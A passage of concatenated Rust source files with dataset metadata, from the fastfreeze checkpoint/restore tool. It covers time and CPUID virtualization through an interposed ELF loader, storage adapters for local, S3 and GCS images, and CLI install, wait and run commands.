read_pid_ts(&mut config_file, 1)?); assert_eq!(machine_clock + 101, read_pid_ts(&mut config_file, 10000)?); assert_eq!(machine_clock + 102, read_pid_ts(&mut config_file, 20000)?); assert_eq!(machine_clock + 103, read_pid_ts(&mut config_file, 20001)?); assert_eq!(machine_clock + 104, read_pid_ts(&mut config_file, PID_MAX)?); assert_eq!(0, read_pid_ts(&mut config_file, 100000)?); // should be not touched // What if we go on a machine which time is earlier than ours. This // will test overflowing substractions. machine_clock = 100; *MACHINE_CLOCK.lock().unwrap() = machine_clock; config.adjust_timespecs(app_clock)?; // the app clock we want assert_eq!(config.read_current_app_clock()?, app_clock); assert_eq!(machine_clock + 100, read_pid_ts(&mut config_file, 1)?); assert_eq!(machine_clock + 101, read_pid_ts(&mut config_file, 10000)?); assert_eq!(machine_clock + 102, read_pid_ts(&mut config_file, 20000)?); assert_eq!(machine_clock + 103, read_pid_ts(&mut config_file, 20001)?); assert_eq!(machine_clock + 104, read_pid_ts(&mut config_file, PID_MAX)?); assert_eq!(0, read_pid_ts(&mut config_file, 100000)?); // Time passes machine_clock += 500; app_clock += 500; *MACHINE_CLOCK.lock().unwrap() = machine_clock; // App do some calls that use the clock write_timespec_at(&config_file, machine_clock + 100, ConfigPath::pid_to_fpos(1))?; write_timespec_at(&config_file, machine_clock + 101, ConfigPath::pid_to_fpos(10000))?; write_timespec_at(&config_file, machine_clock + 102, ConfigPath::pid_to_fpos(20000))?; write_timespec_at(&config_file, machine_clock + 103, ConfigPath::pid_to_fpos(20001))?; write_timespec_at(&config_file, machine_clock + 104, ConfigPath::pid_to_fpos(PID_MAX))?; // We checkpoint assert_eq!(config.read_current_app_clock()?, app_clock); // And restore an another machine machine_clock = 77; *MACHINE_CLOCK.lock().unwrap() = machine_clock; config.adjust_timespecs(app_clock)?; // the app clock we want assert_eq!(config.read_current_app_clock()?, app_clock); assert_eq!(machine_clock + 100, read_pid_ts(&mut config_file, 1)?); assert_eq!(machine_clock + 101, read_pid_ts(&mut config_file, 10000)?); assert_eq!(machine_clock + 102, read_pid_ts(&mut config_file, 20000)?); assert_eq!(machine_clock + 103, read_pid_ts(&mut config_file, 20001)?); assert_eq!(machine_clock + 104, read_pid_ts(&mut config_file, PID_MAX)?); assert_eq!(0, read_pid_ts(&mut config_file, 100000)?); Ok(()) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/virt/mod.rs
src/virt/mod.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. pub mod time; use anyhow::{Result, Context}; use std::{ io::prelude::*, io::{BufRead, BufReader, BufWriter, Cursor}, os::unix::ffi::OsStrExt, env, fs, }; use crate::{ consts::*, process::{Command, Stdio, EnvVars}, }; // The application needs to be virtualized in aspects: CPUID and time. // For this, three libraries are in play: // 1) /lib64/ld-linux-x86-64.so.2: The ELF system loader. We hijack it during the // install command. We replace it with the libvirtcpuid loader. The loader // provides two things: // a) It sets up CPUID virtualization before libc's loader runs. Using // LD_PRELOAD would be too late. // More details can be found at https://github.com/twosigma/libvirtcpuid // b) It provides a way to inject environement variables in any process that uses // the ELF loader (essentially all dynamically loaded binaries). This is // especially useful to force the LD_PRELOAD env variable to applications, even // the one that try hard to clean up their environement. // Note: that's why we need libvirtcpuid, even if we don't need CPUID // virtualization. // 2) libvirtcpuid.so: This library role is to harden the virtualization put in // place by the hijacked ELF loader. It protects the SIGSEGV handler and is // loaded in the application with an LD_PRELOAD directive. // 3) libvirttime.so: This virtualizes CLOCK_MONOTONIC for the application. // It is loaded via LD_PRELOAD. // More details can be found at https://github.com/twosigma/libvirttime. fn env_for_virtualization() -> EnvVars { let mut env: EnvVars = EnvVars::new(); let mut ld_preloads = vec![]; // We always need time virtualization ld_preloads.push(LIBVIRTTIME_PATH.clone()); env.insert("VIRT_TIME_CONF".into(), (&*VIRT_TIME_CONF_PATH).into()); // But not always need CPUID virtualization if let Some(cpuid_mask) = env::var_os("FF_APP_VIRT_CPUID_MASK") { if !cpuid_mask.is_empty() { ld_preloads.push(LIBVIRTCPUID_PATH.clone()); env.insert("VIRT_CPUID_MASK".into(), cpuid_mask); } } // Users can force env variables via FF_APP_INJECT_* for (key, value) in env::vars_os() { // The env var key is all ASCII, it's okay to use to_string_lossy() let key = key.to_string_lossy(); if let Some(key) = key.strip_prefix("FF_APP_INJECT_") { if key == "LD_PRELOAD" { for path in env::split_paths(&value) { ld_preloads.push(path); } } else { env.insert(key.into(), value); } } } // unwrap is okay here as we cannot possibly have a ":" in one of the ld_preload paths. env.insert("LD_PRELOAD".into(), env::join_paths(ld_preloads).unwrap()); env } /// The system ELF loader interposition loads the LD_INJECT_ENV_PATH as /// environment variable for all application on the system. fn inject_env_system_wide(env: &EnvVars) -> Result<()> { || -> Result<_> { // These env variables are forced into any program // that do not have LD_ENV_DISABLE enabled. let mut ld_inject_file = BufWriter::new( fs::File::create(&*LD_INJECT_ENV_PATH)?); for (key, value) in env { // format!() would be nicer, but we need to work with OsString, not String. ld_inject_file.write_all(key.as_bytes())?; ld_inject_file.write_all(b"=")?; ld_inject_file.write_all(value.as_bytes())?; ld_inject_file.write_all(b"\n")?; } ld_inject_file.flush()?; Ok(()) }().with_context(|| format!("Failed to create {}", LD_INJECT_ENV_PATH.display())) } fn ensure_system_wide_virtualization_is_enabled() -> Result<()> { // Check if applications are getting virtualization env injection via libvirtcpuid. let output = || -> Result<_> { Command::new(&["env"]) .stdout(Stdio::piped()) .spawn()? .wait_with_output() .and_then(|o| o.ensure_success().map(|_| o)) }().context("Failed to run the `env` command")?; for line in BufReader::new(Cursor::new(output.stdout)).lines() { if line.unwrap_or_default().starts_with("VIRT_TIME_CONF=") { return Ok(()); } } bail!("Applications can escape virtualization, creating hard to diagnose problems. \ Run `fastfreeze install` to setup virtualization. \ A kuberbetes volume may be needed to interpose the system ELF loader"); } pub fn enable_system_wide_virtualization() -> Result<()> { let env = env_for_virtualization(); inject_env_system_wide(&env)?; ensure_system_wide_virtualization_is_enabled()?; Ok(()) } /// This function is called early on to disable the system wide time /// virtualization on our process. (we need the real time) /// It can call execve(). Note that logging is not setup yet. pub fn disable_local_time_virtualization() -> Result<()> { if env::var_os("VIRT_TIME_CONF").is_some() { // We are currently executing with time virtualization enabled. This is // a problem when we try to get the real machine clock. To avoid this, // we re-exec ourselves with LD_ENV_DISABLE set, which prevents the // libvirtcpuid's loader from injecting env variables into our process. env::set_var("LD_ENV_DISABLE", "1"); env::remove_var("VIRT_TIME_CONF"); env::remove_var("LD_PRELOAD"); // libvirttime.so is in there, and needs to go. Command::new(env::args_os()) .exec() .context("Failed to execve() ourselves to disable time virtualization") } else { // We are not virtualized, but our children should be. env::remove_var("LD_ENV_DISABLE"); Ok(()) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/store/gs.rs
src/store/gs.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use url::Url; use crate::util::UrlExt; // Google Cloud Storage adapter lazy_static! { static ref GS_CMD: String = std::env::var("GS_CMD") .unwrap_or_else(|_| "gcsthin".to_string()); } pub struct Store { url: Url, } impl Store { pub fn new(url: Url) -> Self { Self { url } } } impl super::Store for Store { fn prepare(&self, _write: bool) -> Result<()> { Ok(()) } fn file(&self, filename: &str) -> Box<dyn super::File> { Box::new(File { url: self.url.raw_join(filename) }) } } pub struct File { url: Url, } impl super::File for File { fn upload_shell_cmd(&self) -> String { // TODO Allow lifecycle management options to be configured // https://cloud.google.com/storage/docs/managing-lifecycles format!("{} cp - \"{}\"", *GS_CMD, self.url) } fn download_shell_cmd(&self) -> String { format!("{} cp \"{}\" -", *GS_CMD, self.url) } fn has_not_found_error(&self, stderr: &str) -> bool { stderr.contains("Not Found") || stderr.contains("No such object") } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/store/local.rs
src/store/local.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use std::path::PathBuf; use crate::util::create_dir_all; pub struct Store { path: PathBuf, } impl Store { pub fn new(path: &str) -> Self { Self { path: PathBuf::from(path) } } } impl super::Store for Store { fn prepare(&self, write: bool) -> Result<()> { if write { create_dir_all(&self.path)?; } Ok(()) } fn file(&self, filename: &str) -> Box<dyn super::File> { let file_path = if filename == "/dev/null" { PathBuf::from("/dev/null") } else { self.path.join(filename) }; Box::new(File { path: file_path }) } } pub struct File { path: PathBuf, } impl super::File for File { fn upload_shell_cmd(&self) -> String { // We can unwrap() because the path is valid UTF8, as path comes from a String format!("pv -q > \"{}\"", self.path.to_str().unwrap()) } fn download_shell_cmd(&self) -> String { format!("pv -q \"{}\"", self.path.to_str().unwrap()) } fn has_not_found_error(&self, stderr: &str) -> bool { stderr.contains("No such file or directory") } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/store/s3.rs
src/store/s3.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use url::Url; use crate::{ consts::*, util::UrlExt, }; // AWS S3 adapter lazy_static! { static ref S3_CMD: String = std::env::var("S3_CMD") .unwrap_or_else(|_| "aws s3".to_string()); } pub struct Store { url: Url, } impl Store { pub fn new(url: Url) -> Self { Self { url } } } impl super::Store for Store { fn prepare(&self, _write: bool) -> Result<()> { Ok(()) } fn file(&self, filename: &str) -> Box<dyn super::File> { Box::new(File { url: self.url.raw_join(filename) }) } } pub struct File { url: Url, } impl super::File for File { fn upload_shell_cmd(&self) -> String { // TODO allow users to add an expiration date on images via an env var // XXX aws s3 cp eats 500Mb+ of memory. That's terrible when using multiple shards. // We'll most likely need to make our own upload tool. // This large expected size ensures that there are not too many multiparts pieces let expected_size = 10*GB; format!("{} cp --expected-size {} - \"{}\"", *S3_CMD, expected_size, self.url) } fn download_shell_cmd(&self) -> String { format!("{} cp \"{}\" -", *S3_CMD, self.url) } fn has_not_found_error(&self, stderr: &str) -> bool { stderr.contains("Not Found") } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/store/mod.rs
src/store/mod.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. mod local; mod s3; mod gs; use anyhow::{Result, Context}; use std::{ borrow::Cow, fmt, io::Write, }; use url::{Url, ParseError}; use crate::process::{Stdio, Command}; // `Store` and `File` describe the API needed to store and retrieve images pub trait Store { /// prepare() is called before accessing the storage. It is called: /// * with write=true, during the FastFreeze run command /// * with write=false, during the FastFreeze extract command /// It is not called during the checkpoint command to speed things up. fn prepare(&self, write: bool) -> Result<()>; /// Returns a File object that represents a file of name `filename`. /// Example of file name are "manifest.json" and "XXXX-4.ffs". fn file(&self, filename: &str) -> Box<dyn File>; } pub trait File { /// Returns a shell command to upload file fn upload_shell_cmd(&self) -> String; /// Returns a shell command to download file fn download_shell_cmd(&self) -> String; // Returns whether stderr contains a "not found error" when the download // shell command failed. fn has_not_found_error(&self, stderr: &str) -> bool; } // write()/try_read() are helpers that use the `File` download/upload shell // commands to download and upload content. pub trait FileExt: File { /// Write content to the file, truncating it if necessary. fn write(&self, log_prefix: &'static str, data: &[u8]) -> Result<()> { let mut p = Command::new_shell(&self.upload_shell_cmd()) .stdin(Stdio::piped()) .enable_stderr_logging(log_prefix) .spawn()?; // We are simultaneously writing to stdin and reading stderr. // While we are writing to stdin, the upload shell command might be // blocking on us to drain stderr, leading to a deadlock. // We use a thread to avoid complications. It's a bit overkill, but works. // With a scoped thread, we wouldn't need the data copy, but it's okay // we just use it to copy a small json file (the manifest). let data = Vec::from(data); let mut stdin = p.take_stdin().expect("stdin isn't connected"); let stdin_write_thread = std::thread::spawn(move || stdin.write_all(&data)); p.wait_for_success()?; stdin_write_thread.join().expect("thread panic") .with_context(|| format!("{}> write to stdin failed", log_prefix)) } /// Reads a file. Returns None if it doesn't exist. fn try_read<S>(&self, log_prefix: S) -> Result<Option<Vec<u8>>> where S: Into<Cow<'static, str>> { let log_prefix = log_prefix.into(); let p = Command::new_shell(&self.download_shell_cmd()) .stdout(Stdio::piped()) .stderr(Stdio::piped()) .spawn()?; let output = p.wait_with_output()?; if output.status.success() { Ok(Some(output.stdout)) } else { let stderr = String::from_utf8_lossy(&output.stderr); if self.has_not_found_error(&stderr) { trace!("{}> File does not exist. stderr is: {}", log_prefix, stderr); Ok(None) } else { Err(output.ensure_success_with_stderr_log(log_prefix).unwrap_err()) } } } } impl FileExt for dyn File {} pub struct ImageUrl(Url); impl ImageUrl { /// If url does not start with "scheme:", it is assumed to be a file path. pub fn parse(url_str: &str) -> Result<Self> { match Url::parse(url_str) { Err(ParseError::RelativeUrlWithoutBase) => { ensure!(url_str.starts_with('/'), "Please use an absolute path for the image path"); Self::parse(&format!("file:{}", url_str)) }, Err(e) => bail!(e), Ok(url) => { { let path = url.path(); ensure!(url.path_segments().is_some(), "Image URL path is empty"); ensure!(path.chars().last() != Some('/'), "Image URL path should not end with a trailing /"); } Ok(Self(match url.scheme() { "file" => { // The url parser prefix the relative paths with /, and we // have no way to know once parsed. Which is why we do error // detection here, and not in local::Store. ensure!(url_str.starts_with("file:/"), "Please use an absolute path for the image path"); url }, "s3" | "gs" => url, _ => bail!("Unknown image scheme {}", url), })) } } } pub fn image_name(&self) -> &str { // The unwraps are okay, we already validated that we have some in parse_image_url(). self.0.path_segments().unwrap().last().unwrap() } pub fn store(&self) -> Box<dyn Store> { match self.0.scheme() { "file" => Box::new(local::Store::new(self.0.path())), "s3" => Box::new(s3::Store::new(self.0.clone())), "gs" => Box::new(gs::Store::new(self.0.clone())), // panic!() is okay, validation is already done in parse(). _ => panic!("Unknown image scheme"), } } } impl fmt::Display for ImageUrl { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { write!(f, "{}", self.0) } } #[cfg(test)] mod test { use super::*; #[test] fn test_from_url() { assert!(ImageUrl::parse("file:/tmp/img").is_ok()); assert!(ImageUrl::parse("file:tmp/img").is_err()); } fn test_store_read_write(store: &Box<dyn Store>) -> Result<()> { store.prepare(true)?; store.file("f1.txt").write("test", "hello".as_bytes())?; assert_eq!(store.file("f1.txt").try_read("read test")?, Some("hello".as_bytes().to_vec())); assert_eq!(store.file("none.txt").try_read("read test")?, None); Ok(()) } #[test] fn test_read_write() -> Result<()> { test_store_read_write(&ImageUrl::parse("file:/tmp/ff-test-files")?.store())?; Ok(()) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/cli/install.rs
src/cli/install.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use structopt::StructOpt; use serde::Serialize; use std::io::ErrorKind; use crate::{ consts::*, util::{create_dir_all, find_lib, atomic_symlink, copy_file, set_tmp_like_permissions}, container, }; /// Install FastFreeze, required when namespaces are not available (e.g., Docker). #[derive(StructOpt, PartialEq, Debug, Serialize)] pub struct Install { /// Verbosity. Can be repeated #[structopt(short, long, parse(from_occurrences))] pub verbose: u8, /// Proceed with installation, even if containers can be created, and /// installation would not be necessary. #[structopt(long)] pub force: bool, } pub fn is_ff_installed() -> Result<bool> { Ok(match LD_SYSTEM_PATH.read_link() { Ok(path) => path.eq(&*LD_VIRTCPUID_PATH), // EINVAL means the file is not a symlink. Err(e) if e.kind() == ErrorKind::InvalidInput => false, Err(e) => Err(e).with_context(|| format!("Failed to read link {}", LD_SYSTEM_PATH.display()))?, }) } pub fn prepare_ff_dir() -> Result<()> { // NO_PRESERVE_FF_DIR includes FF_DIR in its subpath. One stone two birds. create_dir_all(&*NO_PRESERVE_FF_DIR)?; // We give /tmp-like permissions to allow other users to write to the directory // But this can fail. We can get an EPERM error if FF_DIR is volume-bind mounted for // example. If chmod fails, that's fine, but fastfreeze can only be ran as the user who // installed fastfreeze. if let Err(e) = set_tmp_like_permissions(&*FF_DIR) .and(set_tmp_like_permissions(&*NO_PRESERVE_FF_DIR)) { warn!("{}\nThat's okay. \ The only restriction is to not change user (uid) when using fastfreeze", e); } // copy /lib/ld-linux.so to /var/tmp/fastfreeze/run/ld-linux.so copy_file(&*LD_SYSTEM_PATH, &*LD_SYSTEM_ORIG_PATH)?; // copy our virtualization libraries to /var/tmp/fastfreeze/run/ for path in &[&*LD_VIRTCPUID_PATH, &*LIBVIRTCPUID_PATH, &*LIBVIRTTIME_PATH] { copy_file(find_lib(path.file_name().unwrap())?, path)?; } Ok(()) } impl super::CLI for Install { fn run(self) -> Result<()> { let Self { verbose: _, force } = self; match (container::ns_capabilities()?.can_mount_ns(), force) { (false, _) => {} (true, false) => bail!( "Installation does not seem necessary because FastFreeze can create mount namespaces. \ Use `--force` if you want to proceed. Use it when building Docker images that are meant to run in restricted environment."), (true, true) => warn!("Installation does not seem necessary, but proceeding anyways"), } prepare_ff_dir()?; // symlink /var/tmp/fastfreeze/run/ld-virtcpuid.so to /lib/ld-linux.so atomic_symlink(&*LD_VIRTCPUID_PATH, &*LD_SYSTEM_PATH) .with_context(|| format!("Failed to override the system ELF loader {}", LD_SYSTEM_PATH.display()))?; Ok(()) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/cli/wait.rs
src/cli/wait.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use std::time::{Instant, Duration}; use structopt::StructOpt; use serde::Serialize; use crate::{ container, lock::checkpoint_restore_lock, }; /// Wait for checkpoint or restore to finish #[derive(StructOpt, PartialEq, Debug, Serialize)] pub struct Wait { /// Fail after some specified number of seconds. Decimals are allowed #[structopt(short, long)] timeout: Option<f64>, /// Verbosity. Can be repeated #[structopt(short, long, parse(from_occurrences))] pub verbose: u8, /// Target the specified application. See the run command help about /// --app-name for more details. #[structopt()] app_name: Option<String>, } impl super::CLI for Wait { fn run(self) -> Result<()> { let Self { timeout, app_name, verbose: _ } = self; let timeout = timeout.map(|t| Instant::now() + Duration::from_secs_f64(t)); container::maybe_nsenter_app(app_name.as_ref())?; let _lock_guard = checkpoint_restore_lock(timeout, false)?; Ok(()) } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/cli/mod.rs
src/cli/mod.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. pub mod run; mod checkpoint; mod extract; mod wait; pub mod install; mod main; use crate::consts::*; pub trait CLI { fn run(self) -> anyhow::Result<()>; } #[derive(Debug)] pub struct ExitCode(pub u8); impl std::fmt::Display for ExitCode { fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { write!(f, "Exiting with exit_code={}", self.0) } } impl ExitCode { pub fn from_error(e: &anyhow::Error) -> u8 { e.downcast_ref::<Self>() .map(|exit_code| exit_code.0) .unwrap_or(EXIT_CODE_FAILURE) } } pub use main::Opts;
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/cli/run.rs
src/cli/run.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use std::{ io::{BufReader, BufWriter}, collections::HashSet, ffi::OsString, fs, path::{Path, PathBuf}, time::{SystemTime, Duration} }; use nix::{ sys::signal, unistd::Pid, }; use structopt::StructOpt; use serde::{Serialize, Deserialize}; use crate::{ consts::*, store::{ImageUrl, Store}, virt, cli::{ExitCode, install}, image::{ManifestFetchResult, ImageManifest, shard, check_passphrase_file_exists}, process::{Command, CommandPidExt, ProcessExt, ProcessGroup, Stdio, spawn_set_ns_last_pid_server, set_ns_last_pid, monitor_child, MIN_PID}, metrics::{with_metrics, with_metrics_raw, metrics_error_json}, signal::kill_process_tree, util::JsonMerge, filesystem, image_streamer::{Stats, ImageStreamer}, lock::with_checkpoint_restore_lock, container, criu, }; use virt::time::Nanos; /// Run application. /// If a checkpoint image exists, the application is restored. Otherwise, the /// application is run from scratch. #[derive(StructOpt, PartialEq, Debug, Serialize)] #[structopt(after_help("\ ENVS: FF_APP_PATH The PATH to use for the application FF_APP_LD_LIBRARY_PATH The LD_LIBRARY_PATH to use for the application FF_APP_VIRT_CPUID_MASK The CPUID mask to use. See libvirtcpuid documentation for more details FF_APP_INJECT_<VAR_NAME> Additional environment variables to inject to the application and its children. For example, FF_APP_INJECT_LD_PRELOAD=/opt/lib/libx.so FF_METRICS_RECORDER When specified, FastFreeze invokes the specified program to report metrics. The metrics are formatted in JSON and passed as first argument FF_FAKE_ROOT Setting to 1 instructs FastFreeze to use uid=0 when creating user namespaces CRIU_OPTS Additional arguments to pass to CRIU, whitespace separated S3_CMD Command to access AWS S3. Defaults to 'aws s3' GS_CMD Command to access Google Storage. Defaults to 'gcsthin' TAR_CMD Command to untar the file system. Defaults to 'tar' EXIT CODES: 171 A failure happened during restore, or while fetching the image manifest. Retrying with --no-restore will avoid that failure 170 A failure happened before the application was ready 128+sig_nr The application caught a fatal signal corresponding to `sig_nr` exit_code The application exited with `exit_code`" ))] pub struct Run { /// Image URL. S3, GCS and local filesystem are supported: {n} /// * s3://bucket_name/image_path {n} /// * gs://bucket_name/image_path {n} /// * file:image_path /// It defaults to file:$HOME/.fastfreeze/<app_name> // {n} means new line in the CLI's --help command #[structopt(short, long, name="url")] image_url: Option<String>, /// Application command, used when running the app from scratch. /// When absent, FastFreeze runs in restore-only mode. #[structopt()] app_args: Vec<OsString>, /// Shell command to run once the application is running. // Note: Type should be OsString, but structopt doesn't like it #[structopt(long="on-app-ready", name="cmd")] on_app_ready_cmd: Option<String>, /// Always run the app from scratch. Useful to ignore a faulty image. #[structopt(long)] no_restore: bool, /// Allow restoring of images that don't match the version we expect. #[structopt(long)] allow_bad_image_version: bool, /// Provide a file containing the passphrase to be used for encrypting /// or decrypting the image. For security concerns, using a ramdisk /// like /dev/shm to store the passphrase file is preferable. #[structopt(long)] passphrase_file: Option<PathBuf>, /// Dir/file to include in the checkpoint image. /// May be specified multiple times. Multiple paths can also be specified colon separated. // require_delimiter is set to avoid clap's non-standard way of accepting lists. #[structopt(long="preserve-path", name="path", require_delimiter=true, value_delimiter=":")] preserved_paths: Vec<PathBuf>, /// Remap the TCP listen socket ports during restore. /// Format is old_port:new_port. /// Multiple tcp port remaps may be passed as a comma separated list. // We use String because we just pass the argument directly to criu-image-streamer. #[structopt(long, require_delimiter = true)] tcp_listen_remap: Vec<String>, /// Leave application stopped after restore, useful for debugging. /// Has no effect when running the app from scratch. #[structopt(long)] leave_stopped: bool, /// Verbosity. Can be repeated #[structopt(short, long, parse(from_occurrences))] pub verbose: u8, /// Specify the application name. This is used to distinguish applications /// when running multiple ones. The default is the file name of the image-url. /// Note: application specific files are located in /tmp/fastfreeze/<app_name>. #[structopt(short="n", long)] app_name: Option<String>, /// Avoid the use of user, mount, or pid namespaces for running the application. /// This requires to run the install command prior. #[structopt(long)] no_container: bool, } /// `AppConfig` is created during the run command, and updated during checkpoint. /// These settings are saved under `APP_CONFIG_PATH`. /// It's useful for the checkpoint command to know the image_url and preserved_paths. /// During restore, it is useful to read the app_clock. #[derive(Serialize, Deserialize)] pub struct AppConfig { pub image_url: String, pub preserved_paths: HashSet<PathBuf>, pub passphrase_file: Option<PathBuf>, pub app_clock: Nanos, // Used to compute the duration between a restore and a checkpoint, for metrics only. pub created_at: SystemTime, // When we pass external pipes to the application as stdin/stdout/stderr, // we need to remember the pipe inodes that we passed, so that when we restore, // we can replace the original external pipes by the new ones. pub inherited_resources: criu::InheritableResources, } impl AppConfig { pub fn save(&self) -> Result<()> { let file = fs::File::create(&*APP_CONFIG_PATH) .with_context(|| format!("Failed to create {}", APP_CONFIG_PATH.display()))?; let file = BufWriter::new(file); serde_json::to_writer_pretty(file, &self)?; Ok(()) } pub fn restore() -> Result<AppConfig> { let file = fs::File::open(&*APP_CONFIG_PATH) .with_context(|| format!("Failed to open {}. \ It is created during the run command", APP_CONFIG_PATH.display()))?; let file = BufReader::new(file); Ok(serde_json::from_reader(file)?) } pub fn exists() -> bool { APP_CONFIG_PATH.exists() } pub fn remove() -> Result<()> { fs::remove_file(&*APP_CONFIG_PATH) .with_context(|| format!("Failed to remove {}", APP_CONFIG_PATH.display())) } } pub fn is_app_running() -> bool { AppConfig::exists() && Path::new("/proc").join(APP_ROOT_PID.to_string()).exists() } // It returns Stats, that's the transfer speeds and all given by criu-image-streamer, // and the duration since the checkpoint happened. This is helpful for emitting metrics. fn restore( image_url: ImageUrl, mut preserved_paths: HashSet<PathBuf>, tcp_listen_remaps: Vec<String>, passphrase_file: Option<PathBuf>, shard_download_cmds: Vec<String>, leave_stopped: bool, ) -> Result<(Stats, Duration)> { info!("Restoring application{}", if leave_stopped { " (leave stopped)" } else { "" }); let mut pgrp = ProcessGroup::new()?; let mut img_streamer = ImageStreamer::spawn_serve(shard_download_cmds.len(), tcp_listen_remaps)?; img_streamer.process.join(&mut pgrp); // Spawn the download processes connected to the image streamer's input for (i, (download_cmd, shard_pipe)) in shard_download_cmds.into_iter().zip(img_streamer.shard_pipes).enumerate() { Command::new_shell(&download_cmd) .stdout(Stdio::from(shard_pipe)) .enable_stderr_logging(format!("download shard {}", i)) .spawn()? .join(&mut pgrp); } debug!("Restoring filesystem"); let untar_ps = filesystem::untar_cmd(img_streamer.tar_fs_pipe.unwrap()) .enable_stderr_logging("untar") .spawn()? .join(&mut pgrp); // We want to wait for 